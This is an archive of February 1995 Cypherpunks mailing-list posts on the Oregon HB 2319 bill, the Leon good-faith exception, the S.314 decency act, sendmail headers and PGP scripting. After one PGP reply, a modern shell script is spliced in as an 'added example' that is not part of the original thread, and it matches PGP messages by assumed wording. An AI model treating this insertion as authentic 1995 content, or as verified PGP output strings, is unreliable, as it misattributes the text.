joshua geller  <alkahest!joshua@dee.retix.com> wrote:
>here come de judge:
>>   The so-called Cypherpunks List, having been a party to this illegal
>>   and "most heinous" distribution, is hereby invited to appear in our
>>   Chambers on the morning of Tuesday, 29 February, 1995, at a place of
>>   our choosing. Defense will be heard, and then the guilty will be
>>   punished.
>
>yes. a fair trial and a speedy execution.

"Like a dog," thought Joseph K.

-- 
......................................................................
  Peter G. Berger, Esq.  Telerama Public Access Internet, Pittsburgh
Internet: peterb@telerama.lm.com Phone: 412/481-3505 Fax: 412/481-8568
	   	 	http://www.lm.com/~peterb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Thu, 9 Feb 95 23:02:22 PST
To: cypherpunks@toad.com
Subject: (fwd) OREGON HOUSE BILL 2319 - Outlaw Anoniminty??
Message-ID: <m0rcpMi-0001eTC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



Damn!! Has this been a crappy week!!!

Sam



Path: skypoint.com!scipio.cyberstore.ca!math.ohio-state.edu!howland.reston.ans.net!news.sprintlink.net!uunet!news.fc.net!ima!libertybbs!terry.liberty-parker
From: Terry.Liberty-Parker@libertybbs.ima.infomail.com (Terry Liberty-Parker)
Date: 09 Feb 95 08:26:51 
Newsgroups: comp.org.eff.talk
Subject: OREGON HOUSE BILL 2319 -
Message-ID: <ff3_9502091822@ima.infomail.com>
Organization: Austin InfoMail Association - Austin, TX
Lines: 112

-=> Note:
Forwarded (from: LIBALERT) by Terry Liberty-Parker using timEd.
Originally from ERIC GRAY (76:48/200.0) to ALL.
Original dated: Feb 05 '95, 03:42

This message was from LES LEMKE to ALL,
and was forwarded to you by ERIC GRAY.
                    -------------------------
( HB 2319 Page 1 )



       68th OREGON LEGISLATIVE ASSEMBLY - 1995 Regular Session


                       HOUSE BILL 2319

Ordered printed by the Speaker pursuant to House Rule 12.00A (5),
Presession filed (at the request of Representative Kevin Mannix)


                            SUMMARY

The following summary is not prepared by the sponsors of the measure
and is not a part of the body thereof subject to consideration by the
Legislative Assembly. It is an editor's brief statement of the
essential features of the measure as introduced.

     Directs operators of computer networks to keep records of
identity of users of network and of personal information about
individuals that is disclosed to users. Requires disclosure to
individual when information about individual is accessed by user of
network. Sets rules for disclosures. Allows injunction or maximum
civil penalty of $100,000, or both, for violation.


                          A BILL FOR AN ACT

Relating to computer information systems.

Be It Enacted by the People of the State of Oregon:

SECTION 1. As used in sections 1 to 3 of this Act:

(1) To "access" means to instruct, communicate with, store data in,
    retrieve data from or otherwise make use of any resources of a
    computer, computer system or computer network.

(2) "Computer" means, but is not limited to, an electronic device
    that performs logical, arithmetic or memory functions by the
    manipulations of electronic, magnetic or optical signals or
    impulses, and includes all input, output, processing, storage,
    software or communication facilities that are connected or
    related to such a device in a system or network.

(3) "Computer network" means, but is not limited to, the
    interconnection of communication lines, including microwave or
    other means of electronic communication, with a computer through
    remote terminals or a complex consisting of two or more
    interconnected computers.

(4) "Computer program" means, but is not limited to, a series of
    instructions or statements, in a form acceptable to a computer,
    that permits the functioning of a computer system in a manner
    designed to provide appropriate products from or usage of such
    computer system.

(5) "Computer software" means, but is not limited to, computer
    programs, procedures and associated documentation concerned with
    the operation of a computer system.

(6) "Computer system" means, but is not limited to, a set of related,
    connected or unconnected, computer equipment, devices and
    software.

(7) "Data" means a representation of information, knowledge, facts,
    concepts, computer software, computer programs or instructions.
    "Data" may be in any form, in storage media, or as stored in the
    memory of the computer, or in transit, or presented on a display
    device. "Data" includes, but is not limited to, computer or human
    readable forms of numbers, text, stored voice, graphics and images.


SECTION 2.

(1) An owner or operator of a computer network or computer system
    shall establish procedures requiring each person who accesses the
    network or system to disclose

NOTE: Matter in boldfaced type in an amended section is new; matter
[italic and bracketed] is existing law to be omitted. New sections
are in boldfaced type.

LC 984







---
 * Origin: Stargate Oregon - North Bend, Oregon USA (1:356/3)

 * OLX 2.2 TD * The oldest question known to man: "Where are my keys?!"

___ GOMail v2.0t Beta [94-0145]
 - Origin: The Desert Reef * LIB * Tuc.Az * V.34 * 602 624 6386 (76:48/200)

--- timEd 1.00
 * Origin: LibertyBBS Austin,Tx [512]462-1776 (1:382/804)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 9 Feb 95 22:28:29 PST
To: dshayer@netcom.com
Subject: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <v02110101ab60a4d6d80d@DialupEudora>
Message-ID: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




With all the guffawing about the bill (666) which just flew by, and the 
"Dem's" running off about how the constitution is being dismantled, I 
thought I would cite some case law.

I direct your attention to _United States v. Leon_, 468 U.S. 897 (1984).

Justice White:

This case presents the question whether the Fourth Amendment 
exclusionary rule should be modified so as not to bar the use in the 
prosecution's case-in-chief of evidence obtained by officers acting in 
reasonable reliance on a search warrant issued by a detached and neutral 
magistrate but ultimately found to be unsupported by probable cause.

[...]

The Fourth Amendment contains no provision expressly precluding the use 
of evidence obtained by violation of its commands, and an examination of 
its origin and purposes makes clear that the use of fruits of a past 
unlawful search or seizure "work[s] no new Fourth Amendment wrong."  The 
wrong condemned by the Amendment is "fully accomplished" by the unlawful 
search or seizure itself, and the exclusionary rule is neither intended 
nor able to "cure the invasion of the defendant's rights which he has 
already suffered."  The rule thus operates as "a judicially created 
remedy designed to safeguard Fourth Amendment rights generally through 
its deterrent effect, rather than a personal constitutional right of the 
person aggrieved."

[...]

First, the exclusionary rule is designed to deter police misconduct 
rather than to punish the errors of judges and magistrates.  Second, 
there exists no evidence suggesting that judges and magistrates are 
inclined to ignore or subvert the Fourth Amendment or that lawlessness 
among these actors requires application of the extreme sanction of exclusion.

[...]

[The exclusionary rule cannot be expected to deter objectively reasonable 
law enforcement activity...]

This is particularly true, we believe, when an officer acting with objective
good faith has obtained a search warrant from a judge or magistrate and acted
within its scope.  In most such cases, there is no police illegality and thus
nothing to deter. It is the magistrate's responsibility to determine whether
the officer's allegations establish probable cause and, if so, to issue a
warrant comporting in form with the requirements of the Fourth Amendment.
In the ordinary case, an officer cannot be expected to question the
magistrate's probable-cause determination or his judgement that the form of
the warrant is technically sufficient.  "[O]nce the warrant issues, there is 
literally nothing more the policeman can do in seeking to comply with the 
law."  Penalizing the officer for the magistrate's error, rather than his 
own, cannot logically contribute to the deterrence of Fourth Amendment 
violations.

END.
++++

The bill is really just a restatement.  This has been the state of the 
law for 11 years now.

If the bill fails, the essence of the doctrine that everyone is concerned 
about stands in any event.

The question is moot.

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 10 Feb 95 02:32:10 PST
To: slowdog@wookie.net (slowdog)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.LNX.3.91.950209195950.9468A-100000@chewy.wookie.net>
Message-ID: <199502101031.FAA23805@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

[ .. ]

> > > broadcast paradigm, while the online world operates within the network 
> > > paradigm. There are no hours in which it is safe to broadcast because 
> > > there is no "broadcast" in the traditional sense.
> > 
> > Yes, I was discussing broadcasting. Scary thought is that because networks
> > are different they will try to outright ban everything.
> 
> I wonder though sometimes if it's even occurred to lawmakers that they 
> can't apply the safe harbor notion for indecency to computer networks.
> 

The lawmakers have been trying to eliminate indecency (not just obscenity)
altogether... they don't want a safe harbor--that's something that came down
from the courts.

> 
> - dog
> 

Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Fri, 10 Feb 95 04:55:05 PST
To: cypherpunks@toad.com
Subject: Re: The question is moot:
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <AZrElu1u6tTT079yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn <unicorn@access.digex.net> wrote:

>
> With all the guffawing about the bill (666) which just flew by, and the
> "Dem's" running off about how the constitution is being dismantled, I
> thought I would cite some case law.
>
> I direct your attention to _United States v. Leon_, 468 U.S. 897 (1984).


666 and 1984.  Talk about irony.

Let's see... Fourth Amendment:

 "The right of the people to be secure in their persons, houses,
  papers, and effects, against unreasonable searches and seizures,
  shall not be violated, and no warrants shall issue, but upon
  probable cause, supported by oath or affirmation, and particularly
  describing the place to be searched, and the persons or things to
  be seized."

What part of "shall not be violated" does Justice White not get?


> Justice White:
>
> This case presents the question whether the Fourth Amendment
> exclusionary rule should be modified so as not to bar the use in the
> prosecution's case-in-chief of evidence obtained by officers acting in
> reasonable reliance on a search warrant issued by a detached and neutral
> magistrate but ultimately found to be unsupported by probable cause.
>
> [...]
>
> The Fourth Amendment contains no provision expressly precluding the use
> of evidence obtained by violation of its commands, and an examination of
> its origin and purposes makes clear that the use of fruits of a past
> unlawful search or seizure "work[s] no new Fourth Amendment wrong."  The
> wrong condemned by the Amendment is "fully accomplished" by the unlawful
> search or seizure itself, and the exclusionary rule is neither intended
> nor able to "cure the invasion of the defendant's rights which he has
> already suffered."  The rule thus operates as "a judicially created
> remedy designed to safeguard Fourth Amendment rights generally through
> its deterrent effect, rather than a personal constitutional right of the
> person aggrieved."
>


Obscured in White's casuistry is the fact that if evidence from
improper searches can be admitted, then the Fourth Amendment itself
is largely made "moot."  White's "this shit don't stink" sophism
notwithstanding.


>  ... Second, there exists no evidence suggesting that judges and
>  magistrates are inclined to ignore or subvert the Fourth Amendment
>  or that lawlessness among these actors requires application of the
>  extreme sanction of exclusion.


Uh Huh...


[ The rest of Justice White's police state apologia omitted.]


> END.
> ++++


> The bill is really just a restatement.  This has been the state of the
> law for 11 years now.
>
> If the bill fails, the essence of the doctrine that everyone is concerned
> about stands in any event.
>
> The question is moot.



This is actually one of the arguments that some proponents of the
bill were using during the House Floor Debate that I was watching on
CSPAN.  If this were the case, then I wondered: Why were they so
intent to pass the bill in the first place??

I don't think that the codification of this earlier Fourth Amendment 
evisceration in federal statute is something I would characterize as 
moot.  I would regard it as a pretty sickening development even if it 
only added insult to injury.  Unfortunately, I doubt that the 666 
seal of approval will fail to further contribute to the ongoing 
destruction of our rights to privacy and due process in this country.



- -Michael




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLztgftGJlWF+GPx9AQH6jwP8DWSNaOKoF7WORQjsRV3E/UbUxBYCGfLi
MKBBCC4TEQPMXy74H4CxJYjwOxBlwFcP0oB9HCAWq1XUX7JYaf7PujdlqHG/j92f
ZaoXfXdX052aXlh24P+dvMH9GZkfT71qla7Y78mfraFEXKzglcuVoE2kbgQFms/f
MaQSnMWFpuk=
=Ox0q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Fri, 10 Feb 95 04:19:46 PST
To: cypherpunks@toad.com (Good Guys)
Subject: Delphi and Encryption??
Message-ID: <199502101219.AA10971@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


RUPERT'S BIG PLANS Media mogul Rupert Murdoch has big plans for his
Delphi Internet Services -- he wants to boost it from fifth to first
place in online service providers. "Internet, Delphi and TV as it
becomes interactive, all will become very much integrated," predicts
HarperCollins' publishing VP. By choosing existing software modules,
such as Mosaic, instead of developing its own graphical user
interface, Murdoch hopes to leapfrog the competition and come out on
top.

Delphi's data encryption technology will also enhance its
^^^^^^^^^^^^^^^^^^^^^^^^
position among privacy-conscious consumers. (Upside Feb.'95 p.39)



Anyone know anything??

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 10 Feb 95 05:05:09 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <Pine.SOL.3.90.950210075752.11373A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I've got a solution that everyone should love:

Let's go ahead and allow illegally obtained evidence - but let's
make it a capital offense for a law-enforcement officer to 
knowingly violate the 4th amendment.  

Strong 4th amendment protection and another wonderful death
penalty all in one!

Brad D.

On Fri, 10 Feb 1995, Black Unicorn wrote:

> 
> 
> With all the guffawing about the bill (666) which just flew by, and the 
> "Dem's" running off about how the constitution is being dismantled, I 
> thought I would cite some case law.
> 
> I direct your attention to _United States v. Leon_, 468 U.S. 897 (1984).
> 
> Justice White:
> 
> This case presents the question whether the Fourth Amendment 
> exclusionary rule should be modified so as not to bar the use in the 
> prosecution's case-in-chief of evidence obtained by officers acting in 
> reasonable reliance on a search warrant issued by a detached and neutral 
> magistrate but ultimately found to be unsupported by probable cause.
> 
> [...]
> 
> The Fourth Amendment contains no provision expressly precluding the use 
> of evidence obtained by violation of its commands, and an examination of 
> its origin and purposes makes clear that the use of fruits of a past 
> unlawful search or seizure "work[s] no new Fourth Amendment wrong."  The 
> wrong condemned by the Amendment is "fully accomplished" by the unlawful 
> search or seizure itself, and the exclusionary rule is neither intended 
> nor able to "cure the invasion of the defendant's rights which he has 
> already suffered."  The rule thus operates as "a judicially created 
> remedy designed to safeguard Fourth Amendment rights generally through 
> its deterrent effect, rather than a personal constitutional right of the 
> person aggrieved."
> 
> [...]
> 
> First, the exclusionary rule is designed to deter police misconduct 
> rather than to punish the errors of judges and magistrates.  Second, 
> there exists no evidence suggesting that judges and magistrates are 
> inclined to ignore or subvert the Fourth Amendment or that lawlessness 
> among these actors requires application of the extreme sanction of exclusion.
> 
> [...]
> 
> [The exclusionary rule cannot be expected to deter objectively reasonable 
> law enforcement activity...]
> 
> This is particularly true, we believe, when an officer acting with objective
> good faith has obtained a search warrant from a judge or magistrate and acted
> within its scope.  In most such cases, there is no police illegality and thus
> nothing to deter. It is the magistrate's responsibility to determine whether
> the officer's allegations establish probable cause and, if so, to issue a
> warrant comporting in form with the requirements of the Fourth Amendment.
> In the ordinary case, an officer cannot be expected to question the
> magistrate's probable-cause determination or his judgement that the form of
> the warrant is technically sufficient.  "[O]nce the warrant issues, there is 
> literally nothing more the policeman can do in seeking to comply with the 
> law."  Penalizing the officer for the magistrate's error, rather than his 
> own, cannot logically contribute to the deterrence of Fourth Amendment 
> violations.
> 
> END.
> ++++
> 
> The bill is really just a restatement.  This has been the state of the 
> law for 11 years now.
> 
> If the bill fails, the essence of the doctrine that everyone is concerned 
> about stands in any event.
> 
> The question is moot.
> 
> -uni- (Dark)
> 
> --
> 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
> 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 08:40:21 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <ab60b81304021004b962@[137.110.24.250]>
Message-ID: <199502101639.IAA21710@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


lcottrell@popmail.ucsd.edu (Lance Cottrell) writes:

>I agree that changing mixmaster to search for a MIME line, rather than the
>:: would be no effort at all.

>I use sendmail for the client and the remailer (actually they are the same
>code), so adding new headers is easy. Unfortunately I am having some
>problems with sendmail. Sendmail is marking the messages as "Apparently
>To:" rather than "To:". Any idea what might cause that?

I think this might be caused by a disagreement between the To: address in
the message itself and whatever "To" address was passed to sendmail on
the command line.  If you pass -t to sendmail then it won't look for a
"To" address on the command line, at least as configured at my site.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 10 Feb 95 09:37:33 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: MIME based remailing commands
In-Reply-To: <199502101639.IAA21710@jobe.shell.portal.com>
Message-ID: <199502101735.JAA18715@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I think this might be caused by a disagreement between the To: address in
> the message itself and whatever "To" address was passed to sendmail on
> the command line.  If you pass -t to sendmail then it won't look for a
> "To" address on the command line, at least as configured at my site.
> 

	It doesn't matter if they disagree. If you don't have a To:
line in the header then "Apparently-To:" gets tacked on using the "To"
from the envelope.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 10 Feb 95 12:43:17 PST
To: emerth@gpu.srv.ualberta.ca
Subject: Re: So, what's it all about?
In-Reply-To: <199502100151.RAA25844@sleepy.retix.com>
Message-ID: <OGwElyczBC4M075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199502100151.RAA25844@sleepy.retix.com>, you wrote:
> 
> >   I went to a UNIX trade show yesterday, and the main speaker was a 
> >   security type. He talked about "the cypherpunks" among other things.
> >   He said you are really scary and dangerous and ...
> >   But of course he had to also project this address (cypherpunks@toad.com)
> >   on the screen.
> 
> can't imagine he is much of a security stud if he is that deluded.
> 
> what was his name?

Lance or Vance something.  Rottweiler, maybe?


   Alan Bostick           | The nice thing about quotes is that they give   
   abostick@netcom.com    | a nodding acquaintance with the originator
finger for PGP public key | which is often socially impressive.
Key fingerprint:          |         Kenneth Williams
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLzukWOVevBgtmhnpAQGX4gL/bsv8KcRiQcoyl+DolBYDz3/dC6sgvTDK
SGXlHo4l9t9g9IALlk4QXTmXehLTiCkVpHOc8VzjGFOi7FQ4oF3yX5TghPObNiKE
hxJrzvlYaFecq7yI74IV9mB0SFfodtRn
=sbdR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Fri, 10 Feb 95 06:52:59 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Not moot? [Was Re: The question is moot: (Was: Not crypto, but scary.)]
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <Pine.3.89.9502100954.A589347486-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was under the  impression that the House bill would change the status 
quo in one important respect: under Leon and similar cases, the "good 
faith" exception only applies when a judge or magistrate has issued a 
warrant which turns out not to be valid.  Under the House bill, this 
erosion of the exclusionary rule is extended to warrantless searches 
(presumably including electronic searches) made in "good faith".  Since 
knowledge of what the Constitution requires can destroy good faith, the 
changes likely to be made in police procedure manuals and curricula are 
left as an exercise for the reader.

OBCrypto: Buy shares in commercial crypto suppliers now.  Demand should 
be going up.

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's barely warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Fri, 10 Feb 95 06:56:08 PST
To: cypherpunks@toad.com
Subject: a draft petition against S.314
Message-ID: <Pine.LNX.3.91.950210095638.10065A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


[A draft petition, comment, but do it QUICKLY.]


In united voice, we sign this petition against passage of S.314 ("The 
Communications Decency Act of 1995") for these reasons:

S.314 would prohibit not only individual speech that is "obscene, lewd,
lascivious, filthy, or indecent", but would prohibit any provider of
telecommunications service from carrying such traffic, under threat of
stiff penalty. Even aside from the implications for free speech, this
would cause an undue - and quite possibly unjust - burden upon operators
of various telecommunications services. In a time where the citizenry and
their lawmakers alike are calling for and passing "no unfunded mandates" 
laws, it is unfortunate that Congress might seek to impose unfunded
mandates upon businesses that provide the framework for the information
age. 

The threat of such penalty alone might result in a chilling effect in the
telecommunications service community, again creating an environment
contrary to the principles of free speech, press, and assembly -
principles which entities such as the internet embody as nothing has
before.

We ask that the Senate halt any further progress of this bill. We ask 
that the Senate be an example to Congress as a whole, and to the nation 
at large - to promote the general welfare as stated in the Preamble to 
the Constitution by protecting the free flow of information and ideas 
across all of our telecommunications services.




- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Hollander <hh@xcf.Berkeley.EDU>
Date: Fri, 10 Feb 95 11:03:28 PST
To: cypherpunks@toad.com
Subject: why pgp sucks
Message-ID: <9502101849.AA21833@xcf.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


if i use a command like

	pgp filename

it will automatically figure out the right thing to do with the file.  if
it's encrypted, and i have the key, it will attempt to decrypt it.  if it
contains keys, it will ask if i want to add them to my keyring.  if it's
signed, it checks the signature.

this sucks!

if i'm trying to write a program to automatically process incoming mail (for
instance, to see if it's encrypted with a specific key), i certainly don't
want to have the possibility of people being able to add garbage to my
keyring just by mailing it to me.

is there a way of saying

	pgp -decrypt-with-key user_id filename

and have it return some error code indicating whether or not the file was in
fact encrypted with user_id, and also guaranteeing that it won't do other
fun stuff with the file, like add it to my keyring?

is there a way of using pgp in a diagnostic mode, to just inform me of what
the file contains (is it signed and/or encrypted, from who and to whom?),
without processing it, and without interaction, and without messing around
with the keyring?  has anyone written some scripts to do this kind of thing?

or should i just wait until some of the groups working on the other
encryption software get it out?

e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgh5868@ultb.isc.rit.edu (M.G. Hunsberger)
Date: Fri, 10 Feb 95 08:34:32 PST
To: cypherpunks@toad.com
Subject: HR830 - Anyone tracking this?
Message-ID: <9502101634.AA18707@ultb.isc.rit.edu>
MIME-Version: 1.0
Content-Type: text


 
The recent version of the EFFector Online had some information about the
House of Representatives' Bill HR830.  They say that this bill is being
rammed through Congress and would cripple FOIA.  It would seemingly 
change any public information that is given value to non-public
information.  Does anyone have any further information?  
 
Mike 

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 10 Feb 95 09:22:43 PST
To: cypherpunks@toad.com
Subject: Global Filesystem Guild
Message-ID: <9502101722.AA04330@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



To reduce the vulnerability of a single user/BBS to having their files
confiscated/stolen, could a distributed WAN filesystem be implemented with
k-redundancy, e.g. the files wouldn't disappear until k servers (located in
various unknown or inaccessible places) failed?  The price of storage would
vary with the level of redundancy desired.  For security the servers would
only store cyphertext, etc.  Local caching to reduce network load.

Andrew File System (from Transarc/IBM) implements the distributed
filesystem and namespace and some security, but not the redundancy for RW
files. (And it's not shareware).

Issues:
Quota management.
Pricing (for space or time)
Security: (only store cyphertext?)
Ownership: (who gets to delete files?)
...

Sort of the next level beyond SecureFS?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 12:27:59 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <199502102027.MAA20904@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hollander <hh@xcf.Berkeley.EDU> writes:

>if i use a command like

>	pgp filename

>it will automatically figure out the right thing to do with the file.  if
>it's encrypted, and i have the key, it will attempt to decrypt it.  if it
>contains keys, it will ask if i want to add them to my keyring.  if it's
>signed, it checks the signature.

>this sucks!

>if i'm trying to write a program to automatically process incoming mail (for
>instance, to see if it's encrypted with a specific key), i certainly don't
>want to have the possibility of people being able to add garbage to my
>keyring just by mailing it to me.

In my remailer, I use: pgp -f < infile > outfile.  This won't add keys.
If you capture standard error you can parse it (grep is probably good
enough) to see whether the message was signed, encrypted, had a bad
signature, had keys, etc.

Hal
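
Hal's suggestion above (run `pgp -f` and grep the captured standard error), as an added example that is not part of the original post and is not the remailer's own code. The function names are hypothetical, the matched strings are assumed PGP 2.6.x message wordings that should be confirmed against the build in use, and the sample stderr text is constructed.

```shell
#!/bin/sh
# Classify the stderr text captured from a PGP filter-mode run, e.g.
#   pgp -f < infile > outfile 2> errfile
# The patterns below are ASSUMED PGP 2.6.x message wordings; confirm them
# against the output of the build you actually run before relying on them.

# _pgp_has PATTERN TEXT: succeed if some line of TEXT matches PATTERN.
_pgp_has() {
    printf '%s\n' "$2" | grep -Eq -- "$1"
}

# classify_pgp_stderr TEXT: print a space-separated list of tags.
classify_pgp_stderr() {
    text=$1
    tags=""
    if _pgp_has 'File is encrypted' "$text"; then tags="$tags encrypted"; fi
    if _pgp_has 'do not have the secret key' "$text"; then tags="$tags no-secret-key"; fi
    if _pgp_has 'Good signature from' "$text"; then tags="$tags sig-good"; fi
    if _pgp_has 'Bad signature' "$text"; then tags="$tags sig-bad"; fi
    if _pgp_has "[Cc]an't find the right public key" "$text"; then tags="$tags sig-unknown-key"; fi
    if _pgp_has 'File contains key' "$text"; then tags="$tags has-keys"; fi
    # Nothing recognised: say so explicitly instead of returning an empty list.
    if [ -z "$tags" ]; then tags=" unrecognized"; fi
    printf '%s\n' "${tags# }"
}

# pgp_policy TAGS: fail-closed decision for an unattended mail processor.
# Anything carrying key material, a bad signature, an undecryptable body or
# unrecognised output is rejected; only encrypted mail is accepted.
pgp_policy() {
    case " $1 " in
        *" has-keys "*|*" sig-bad "*|*" no-secret-key "*|*" unrecognized "*)
            echo reject
            return 0 ;;
    esac
    case " $1 " in
        *" encrypted "*) echo accept ;;
        *)               echo reject ;;
    esac
}

# Constructed sample stderr captures (not real PGP output).
SAMPLE_ENC_SIGNED='File is encrypted.  Secret key is required to read it.
Key for user ID: Remailer <remailer@example.org>
Good signature from user "Alice <alice@example.org>".'

SAMPLE_KEYS='File contains key(s).  Contents follow...'

SAMPLE_BAD="File is encrypted.  Secret key is required to read it.
WARNING: Bad signature, doesn't match file contents!"

# Stand-alone demonstration over the constructed samples.
for s in "$SAMPLE_ENC_SIGNED" "$SAMPLE_KEYS" "$SAMPLE_BAD"; do
    t=$(classify_pgp_stderr "$s")
    printf '%-22s -> %s\n' "$t" "$(pgp_policy "$t")"
done
```

The policy function treats unrecognised output as a rejection, so a change in PGP's message wording fails closed rather than letting unclassified mail through.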




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 12:32:05 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <9502101958.AA15039@snark.imsi.com>
Message-ID: <199502102031.MAA21422@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:
>I'll also note, yet again, that unless PGP quits this bad practice of
>identifying counterparties only by a number, it is NOT going to be
>universally deployed. Counterparties need to be identified by a name
>that can be looked up in the DNS -- meaning "joe@foo.com" rather than
>some key ident number.

PGP of course looks up keys by strings in addition to numbers.  A widely
accepted practice is to use <joe@foo.com> in the user ID which allows the
lookups to be by internet address.  PGP was intended for use beyond the
internet, such as in bbs's, fidonet, corporate networks, etc., where DNS
style addresses may not be useful.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 10 Feb 95 09:43:36 PST
To: cypherpunks@toad.com
Subject: PSI Gulps Pipeline
Message-ID: <199502101742.MAA05625@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarding mail by: gleick@pipeline.com (James Gleick) on Fri, 
10 Feb  0:12 AM
-------------------


Dear Pipeliners,


I'm pleased to be able to tell you that the Pipeline has become 
part of  a larger enterprise: Performance Systems International 
(PSINet), the  nation's leading Internet access provider.


That means two things immediately. 


First, PSINet has a state-of-the-art dialup network in many 
cities  across the nation, and these will shortly be available 
to our users at  a cost much less than our current out-of-town 
SprintNet surcharges.


Second, PSINet plans to use our Internaut software as the basis 
for a  national service--not to replace the New York-based 
Pipeline but to  provide an alternative for out-of-towners who 
don't especially care  about New York information and services.


PSINet is a company a lot like ours--small (though not so small 
 anymore), enthusiastic, fast-moving, and steeped in Internet 
history.  The people there care about the Internet as an 
environment worth  preserving even as it grows so explosively.  
And they admire what we've  accomplished here at the Pipeline 
in forming a model online service.


That's enough for now--there will be more information following 
along  behind, but I wanted you to hear it here first.  As for 
me--this isn't  goodbye, exactly, but I have gotten a little 
behind on a book I was  supposed to be writing . . .


I am deeply grateful to all of you--staff and customers--for 
making  the Pipeline what it is and for letting me get to know 
you a little bit.


Jim


--
James Gleick
The Pipeline





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 09:57:50 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: URGENT - What S.314 Would Do
In-Reply-To: <Pine.SV4.3.91.950208020311.25943A-100000@mirage.skypoint.com>
Message-ID: <9502101755.AA04883@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


